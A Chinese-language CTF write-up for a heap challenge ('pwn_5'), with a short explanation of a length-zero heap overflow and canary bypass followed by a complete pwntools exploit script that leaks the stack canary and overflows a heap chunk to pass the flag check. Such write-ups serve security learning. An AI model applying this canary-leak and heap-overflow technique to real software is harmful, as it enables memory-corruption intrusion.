太忙了,下午4点才开始做,剩下的以后补上
签个到
逻辑很简单,两个功能的堆:一个就是申请heap、还有一个是检验,如果校验通过就会得到flag
申请模块
中间0x886是个很恶心的东西,需要我们绕过。
这个可以用len为0造成堆溢出来绕过
这里只需要将heap内容的前8位设置成canary即可,并且输入的data需要和heap+4到heap+12地方的内容都一样,一样也是可以绕过的
exp:
#encoding = utf-8
import os
import sys
import time
from pwn import *
from ctypes import *
#from LibcSearcher import *
# Target settings and thin wrappers around the pwntools tube `p`, so the rest
# of the script reads as short send/receive steps.
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'


# NOTE: every send wrapper below runs its argument through str(); on Python 3
# that turns a bytes payload into its repr ("b'...'"), so the callers in this
# file pass only str/int through these and send raw bytes via `p` directly.
def s(data):
    """Send str(data) on the tube with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for str(delim), then send str(data) with no trailing newline."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for str(delim), then send str(data) followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(num):
    """Receive up to `num` bytes."""
    return p.recv(num)


def ru(delims, drop=True):
    """Receive until `delims`; `drop` is passed through to recvuntil."""
    return p.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the terminal."""
    return p.interactive()


def uu32(data):
    """Unpack `data` as a little-endian u32, right-padding with NULs to 4 bytes."""
    padded = data.ljust(4, b'\x00')
    return u32(padded)


def uu64(data):
    """Unpack `data` as a little-endian u64, right-padding with NULs to 8 bytes."""
    padded = data.ljust(8, b'\x00')
    return u64(padded)


def leak(name, addr):
    """Log `addr` under `name` as a hex value via pwntools' success logger."""
    message = '{} = {:#x}'.format(name, addr)
    return log.success(message)


# Local process and its ELF; the libc line is kept commented as in the original.
p = process('./pwn_5')
elf = ELF('./pwn_5')
#libc = ELF('./libc.so.6')
def debug():
    """Attach gdb to the running target `p` and pause the script for inspection."""
    tube = p
    gdb.attach(tube)
    pause()
def add(lent, name):
    """Drive menu option 1: select it, answer the length prompt with `lent`,
    then send `name` at the name prompt.

    `lent` goes through the str()-coercing `sla` wrapper; `name` is sent
    raw with p.sendlineafter so a bytes payload is not mangled by str().
    """
    for prompt, value in (('> ', 1), ('power length: ', lent)):
        sla(prompt, value)
    p.sendlineafter('name: ', name)
def pwn():
    """Interaction sequence described in the write-up above; it is order-dependent,
    so the steps are kept exactly as given."""
    # Answer the name prompt with 9 'a's and consume the echo; the next 7 bytes
    # are taken as the canary and shifted up one byte by *0x100 (low byte zero).
    sa('who are u?\n','a'*9)
    ru('a'*9)
    canary = uu64(r(7))*0x100
    leak('canary',canary)
    # Length-0 allocation with an oversized name: the write-up calls this the
    # len=0 overflow used to get past the 0x886 check. The 0x20d51 constant is
    # not explained on the page -- presumably a size field; confirm in gdb.
    add(0,b'a'*0x14+p64(0x0000000000020d51)+p64(canary)+b"aaaa")
    # The upper 32 bits of the canary, repeated, form the 8-byte value the
    # check compares against (heap+4..heap+12 per the write-up).
    print(hex(canary//0x100000000))
    add(0x10,p32(canary//0x100000000)+p32(canary//0x100000000))
    # Menu option 2 is the check; per the write-up, passing it prints the flag.
    sla('> ',2)
    #debug()
    p.sendlineafter('data: ',p32(canary//0x100000000)+p32(canary//0x100000000))
    itr()
if __name__ == "__main__":
    # Script entry point: run the interaction defined in pwn().
    pwn()